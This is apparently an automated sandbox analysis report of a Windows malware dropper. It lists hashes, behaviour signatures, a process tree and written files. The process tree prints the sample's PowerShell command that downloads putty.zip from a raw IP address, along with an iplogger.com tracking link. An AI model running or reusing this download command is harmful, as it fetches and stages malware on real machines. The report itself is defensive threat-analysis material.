Analysis

  • max time kernel
    134s
  • max time network
    128s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
  • submitted
    31-05-2024 19:39

General

  • Target

    66a5a529386533e25316942993772042.exe

  • Size

    5.9MB

  • MD5

    66a5a529386533e25316942993772042

  • SHA1

    053d0d7f4cb6e3952e849f02bbfbdb4d39021146

  • SHA256

    713a497c8da97c2082758fd31147539f408a72b62041c6c9ed77037021621e94

  • SHA512

    9f4f69e9d1a3265311cd9f4bb9a254f157e1e0b7536466e88449f410f297d501d10448b170901206fff0ffde6d7e8a50b84e391fd62ff0f9355b506959cc336a

  • SSDEEP

    98304:6QqmVoQ/tUAh8ggYJCHtEFy3X1mDyV/w4qp/tkC9+yZ+KZ8dSHLNejiRuO+4GiW:6QqmVo481z1mYbWSCeKhxqr7h

Score
10/10

Malware Config

Extracted

  • Language: ps1
  • Deobfuscated
  • URLs: exe.dropper
    http://94.103.188.126/jerry/putty.zip

Signatures

  • Loads dropped DLL (2 IoCs)
  • Checks installed software on the system (1 TTP)

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 (1 TTP, 3 IoCs)
  • Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)

    Using powershell.exe command.

  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings (1 TTP, 36 IoCs)
  • Suspicious behavior: EnumeratesProcesses (1 IoC)
  • Suspicious use of AdjustPrivilegeToken (1 IoC)
  • Suspicious use of FindShellTrayWindow (1 IoC)
  • Suspicious use of SetWindowsHookEx (4 IoCs)
  • Suspicious use of WriteProcessMemory (25 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\66a5a529386533e25316942993772042.exe
    "C:\Users\Admin\AppData\Local\Temp\66a5a529386533e25316942993772042.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2180
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C cd "C:\Users\Admin\AppData\Local\Temp\putty" & "Smartscreen.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2700
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "(New-Object Net.WebClient).DownloadFile('http://94.103.188.126/jerry/putty.zip', 'C:\Users\Admin\AppData\Local\Temp\putty.zip')"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2136
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.com/26uSj6
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2544
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2544 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:2588

Network

MITRE ATT&CK Enterprise v15

Downloads

Files written during the run, with sizes:

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (70KB)
  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (21 versions written during the run, 342B to 344B each)
  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\6y0a2v0\imagestore.dat (5KB)
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IW68H88T\favicon[2].ico (5KB)
  • C:\Users\Admin\AppData\Local\Temp\Cab5CA2.tmp (68KB)
  • C:\Users\Admin\AppData\Local\Temp\Tar5CA5.tmp (177KB)
  • C:\Users\Admin\AppData\Local\Temp\Tar5D67.tmp (181KB)
  • C:\Users\Admin\AppData\Local\Temp\putty\Smartscreen.bat (238B)
  • \Users\Admin\AppData\Local\Temp\nsy1AA3.tmp\UAC.dll (14KB)
  • \Users\Admin\AppData\Local\Temp\nsy1AA3.tmp\nsExec.dll (6KB)